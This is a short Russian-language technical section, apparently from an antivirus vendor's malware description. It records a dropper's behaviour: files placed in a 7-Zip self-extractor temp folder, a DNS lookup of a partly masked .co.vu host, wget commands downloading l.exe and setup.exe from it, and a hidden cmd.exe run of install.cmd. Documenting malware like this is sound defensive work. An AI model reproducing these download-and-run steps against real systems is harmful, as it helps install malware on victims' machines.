Техническая информация
- %TEMP%\7zipsfx.000\install.cmd
- %TEMP%\7zipsfx.000\wget.exe
- %TEMP%\7zipsfx.000\install.cmd
- %TEMP%\7zipsfx.000\wget.exe
- DNS ASK be#####dnacer1989.co.vu
- '%TEMP%\7zipsfx.000\wget.exe' http://be#####dnacer1989.co.vu/l.exe
- '%TEMP%\7zipsfx.000\wget.exe' http://be#####dnacer1989.co.vu/setup.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\install.cmd" "